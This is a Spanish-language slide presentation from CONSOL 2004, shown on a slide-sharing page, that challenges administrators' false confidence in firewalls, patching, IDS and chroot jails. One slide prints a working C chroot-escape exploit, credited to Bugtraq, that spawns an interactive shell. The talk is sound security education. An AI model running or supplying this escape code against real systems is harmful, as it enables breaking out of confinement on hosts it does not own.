2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.

Slides:



Advertisements
Presentaciones similares
"NADIE TE AMA COMO YO".
Advertisements

GFI LANguard Network Security Scanner Version 8 .0 !
INTERNET: ¿ÚTIL O PELIGROSO? Enrique Martín Antona-2010
Meditemos escuchando “He comido Tu Cuerpo” (7’) de la Pasión de Bach
de llevarse bien con todos
Jaime Callejo Del Grado Luis Gutiérrez 1º C
MEDIDAS DE SEGURIDAD ACTIVAS Y PASIVAS
En Venezuela el dictador nos invita todos los días a que instalemos los barrotes y muchos los están colocando y asegurándolos muy bien, no cabe la menor.
Rubrica para evaluar Trabajo en Equipo: Co-Evaluación
Que sabes de tu windows tienes uno verdad ??? Sabes si es original o no.
               CUANDO EL HIJO NOS DICE:
"AMIGO " DE ROBERTO CARLOS
EXPERIMENTA EL CORAZÓN DE JESÚS
Curso Administrador Linux
Utilice el mouse para ver esta presentación
02 de abril de 2017 Automático..
La lista de 100.
Límpia si hace falta.
Control de Navegación en Internet. « Es el programa que todo empresario quisiera tener sobre la mesa» J.L.G. Reflexión Control Manager ha sido creado.
CUANDO TU HIJO TE DICE: ¡¡MAMA, PAPA; NO TE METAS!!!
MI CUMPLEAÑOS ESTE AÑO.
Paulo Coelho La Fábula del Lápiz Del libro
1.Firewall 2.Herramientas de detección de intrusión 3.Recuperación de datos PREVENCIÓN/DETECCIÓN Y RECUPERACIÓN ALARCON BELLO MIGUEL ANGEL.
Auditoría de Sistemas y Software
Posible villa Karina Grupo 210 Materia tic  1…………..Primaria 1…………..Primaria  2………….Secundaria 2………….Secundaria  3…………..Bachillerato 3…………..Bachillerato.
Seguridad, paz y gozo en Cristo
Inicio rápido: 5 LLAVES DEL ÉXITO Ing. Juan Manuel Bustos.
ADRIANA DIAZ: presentadora VLADIMIR LUGO: presentador CRISTINA ESQUIVEL: oyente que nos da a conocer el caso de su vida ANDERSON SANTAMARIA: comentador-
Capacitación Técnicas de cierre No actuar como vendedor ! Actúa como asesor, consultor. ESCUCHA!
Diego Pastor Ralde. Client-side Vulnerabilities  Web Browsers  Office Software  Clients  Media Players.
La Distancia Marta Villavicencio. La Distancia Marta Villavicencio.
Paso a paso de la instalación de Windows xp Instalar Windows Enciende el ordenador y mete el cd de instalación de Windows xp. Si la configuración de.
Continuar La persona que me mandó esta información es un Técnico de Ordenadores que gasta mucho tiempo borrando los correos no deseados de sus clientes,
Recuérdame.
Trabajo más que cualquier mortal pero más fácilmente porque lo hago segundo a segundo.
Palabras de un Reloj.
TE PRESENTAMOS ESTE POWERPOINT DE NAVIDAD
Cecilia Menéndez González Erick Giovanni Sánchez Madero Miguel Ángel González Alarcón.
Palabras de un Reloj.
07 de Mayo de 2015 Práctica: Comunicación Efectiva Nivel 2 Cuatrimestre 1 Comunicación Efectiva Ejecutivo Jr.
SEXUALIDAD & ANTICONCEPTIVOS MIGUEL SANDOVAL FT ROBERTO DOMINGUEZ.
LENGUAJE “C” Programación. Condicionales Los condicionales permiten al programa escoger entre varios posibles resultados dependiendo de la evaluación.
HACKERS No quieren molestar o causar problemas a la gente, su trabajo es estudiar y aprender.
PLANTEL 13 XOCHIMILCO –TEPEPAN TEGNOLOGIA DE LA INFORMACION II
Acuerdate es mi Cumpleaños
“Cuando, pues, el Señor entendió que los fariseos habían oído decir: Jesús hace y bautiza más discípulos que Juan (aunque Jesús no bautizaba, sino.
Tus experiencias te han moldeado
MI CUMPLE ESTE AÑO..
Iniciativa y Autodirección Comunicación Efectiva Fecha: 17/06/2011 Práctica: “Comunicación Efectiva” Ejecutivo Inplant/Front Master Nivel 2 Semestre 3.
Esta animación fue realizada para ser vista dentro de 20 años mas tarde. Este aviso aparece por que se que no vas a aguantar las ganas de verlo, y seguramente.
José iba en su nuevo automóvil, un gran Jaguar a mucha velocidad.
NADIE TE AMA COMO YO.
Relato. En cierta ocasión, varios amigos viajaron al Ashram de su Maestro. Dos de ellos, pidieron una habitación, sólo para ellos.
UNIVERSIDAD NACIONAL AUTONOMA DE MEXICO COLEGIO DE CIENCIAS Y HUMANIDADES PLANTEL VALLEJO VIRUS INFORMATICOS TALLER DE COMPUTO.
Básicamente, el mantenimiento preventivo puede ser definido como la reparación de fallos que se han presentado sin previo aviso. Dichos fallos pueden.
Camina por la clase y cuéntale a 5 personas diferentes lo que hiciste este fin de semana. Habla sólo en español. Fui… Vi… Comí… Visité… Estuve CALENTAMIENTO.
Di Sin Dudar Dios existe. Dios creó el mundo. La Biblia es la Palabra de Dios. Jesús es el Hijo de Dios. F RENTE A F RENTE C ON L OS I NCRÉDULOS Debemos.
UNIVERSIDAD TECNOLÓGICA DE PUEBLA. CARRERA: TECNOLOGÍAS DE LA INFORMACIÓN Y COMUNICACIÓN. ÁREA: REDES Y TELECOMUNICACIONES. PROFESORA: RUBICELL PINEDA.
Meditemos escuchando “He comido Tu Cuerpo” (7’) de la Pasión de Bach SEMANA SANTA.
Juan 17. Juan 17 Juan 17: Mas no ruego solamente por éstos, sino también por los que han de creer en mí por la palabra de ellos, 21 para que.
Visite: MI CUMPLEAÑOS Visite:
“He comido Tu Cuerpo” de la Pasión de Bach SEMANA SANTA Monjas de Sant Benet de Montserrat.
¡CREALO! Sin Dudar ¡Dando Una Mirada Más de Cerca a la Evidencia Que
Antivirus en la Nubes Es un SOFTWARE de tipo Antivirus, que este mismo no consume muchos recursos y no pide mucho hardware para ejecutarlo. Además su.
Hubo una vez dos mejores amigos...
Los planes de Dios Éxodo 2: ¿Qué quieres de mí? Buscando la voluntad de Dios. Introducción Grandes expectativas Los planes de Dios.
27 de Septiembre de 2004 Soluciones a problemas cotidianos en la red: Seguridad, virus, correo basura Soluciones integradas de seguridad. IberEscudo.
Por si me olvidé decirlo, por si hace mucho que no lo escuchas, por si no lo sabes o tienes duda, por si te hace falta oírlo o solo porque sí: I LOVE.
La hija de un hombre le pidió al sacerdote que fuera a su casa a hacer una oración para su padre que estaba muy enfermo. Cuando el sacerdote llegó a la.
SEGURIDAD EN LA RED. INTERNET Y SUS PRECAUCIONES El uso de Internet ha traído grandes beneficios, entre ellos conocer información al instante de cualquier.
Transcripción de la presentación:

El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © Sandino Araico Sánchez Se permite ilimitadamente el uso, copia, redistribución con o sin modificaciones siempre y cuando se mantenga el aviso de derecho de autor y se anoten al final de la presentación todas las modificaciones que se llevan a cabo conservando la historia de las modificaciones que hagan las demás personas e indicando la fecha de cada modificación y el nombre de la persona que la llevó a cabo.

Me siento muy seguro

Porque a nadie le interesa mi servidor Porque si me hackean ¿qué importa?

Porque a nadie le interesa mi servidor... ¿ni a los defacers brasileños? ¿ni a los spammers?

Porque si me hackean ¿qué importa? ¿Y si me usan de trampolín para atacar a otros sitios? ftp://ftp.porcupine.org/pub/security/tcp_wrapper.txt.Z ¿Y si me usan de trampolín para mandar spam?

Porque tengo mi firewall IPTables

Porque tengo mi firewall IPTables... ¿Y qué no sabes que IPTables no te protege un servicio que esté vulnerable? y

Porque uso OpenBSD

Porque uso OpenBSD... ¿Y qué versión usas? ¿Y cuándo fue la última vez que actualizaste tu sistema?

Porque uso OpenBSD... ¿Y tienes bién configurado tu servidor? ¿Buenos passwords? ¿Usuarios que se conecten por FTP, POP o IMAP?

Porque mi servidor siempre está actualizado

Porque mi servidor siempre está actuali... ¿Has escuchado hablar de los zero days?

Porque mi servidor siempre está actuali... ¿Y tienes bién configurado tu servidor? ¿Buenos passwords? ¿Usuarios que se conecten por FTP, POP o IMAP?

Porque pasé la auditoría (Nessus no me encontró vulnerable)

Porque núnca nadie me ha penetrado

Porque núnca nadie me ha ¿ penetrado? ¿Asististe a la plática del martes a las 18 horas en el salón de seminarios de la biblioteca?

Porque tengo unos administradores de sistemas buenísimos

Porque en mi Linux no corren los virus Porque en mi PowerPC no corren los exploits

Porque en mi Linux no corren los virus... =001&findWhere=&findTxt=Linux

Porque en mi PowerPC no corren los exploits... #include #include main() { int i; if (chdir("/") != 0) exit(1); mkdir("kk", 0777); if (chroot("kk") != 0) exit(1); for (i=0; i<50; i++) { if (chdir("..") != 0) exit(1); if (chmod("..", S_IXOTH) != 0) exit(1); } if (chroot(".") != 0) exit(1); execl("/bin/sh", "sh", "-i", (char *)0); exit(0); } Fuente: Bugtraq

Porque tengo un SNORT que me avisa todo y cierra los puertos

Porque tengo un SNORT que me avisa todo y cierra los puertos... ¿Y qué a caso estás suponiendo que Snort es invulnerable?

Porque acabo de instalar Tripwire

Pero acabadito de instalar, de tal manera que todos los troyanos instlados previamente ya se encuentran firmados y Tripwire nos avisará cuando sean limpiados.

Porque creo firmemente en la seguridad por obscuridad y nadie sabe cómo funcionan las aplicaciones que hice

Porque me certifica Verisign

Porque todos mis servicios los tengo chrooteados

Porque todos mis servicios los tengo chrooteados... ¿Sabías que hay técnicas para salirse de la jaula? bin/swsearch/swish.cgi?query=chroot&metaname =alldoc

Porque no tengo ningún puerto abierto

Porque no tengo ningún puerto abierto... ¿Y qué, no navegas? ¿Y de casualidad no estarás usando GAIM?

Porque no tengo ningún puerto abierto... Ahora que si se trata de un servidor creo que tienes un problema grave de negación de servicio.

Porque uso GR Security

Porque uso GR Security... Pues ¿Qué crees? /0011.html

Porque me audité a mi mismo y no me pude penetrar

Porque me audité a mi mismo y no me pude penetrar... ¿Y ya te auditó un tercero? ¿Y tus IDSes detectaron las pruebas de penetración?

Porque de todos los exploits que bajé de Security Focus ninguno jaló

Porque de todos los exploits... ninguno jaló... ¿Y los revisaste línea por línea para asegurarte de que no estuvieran troyaneados? ¿Y estás seguro de haber entendido perfectamente su funcionamiento?

Porque me llamo Theo y reviso línea por línea el código fuente de todos los programas que correrán en mi máquina y los compilo a pata

Porque me llamo Theo... Ah, por cierto, No los quiero convencer, sólo muestro las evidencias -- J. Maussan

Porque acabo de poner mi propio puesto de tacos

Conclusiones Sysadmines ya pónganse las pilas Consultores ya dejen de tomarles el pelo a sus clientes La paranoia rula, sobre todo cuando sabes lo que esás haciendo

Muchas gracias Sandino Araico Sánchez

¿Comentarios?

Feedback: Política de privacidad Feedback
Do Not Sell My Personal Information
Sobre el proyecto: SlidePlayer Condiciones de uso

© 2025 SlidePlayer.es Inc. All rights reserved.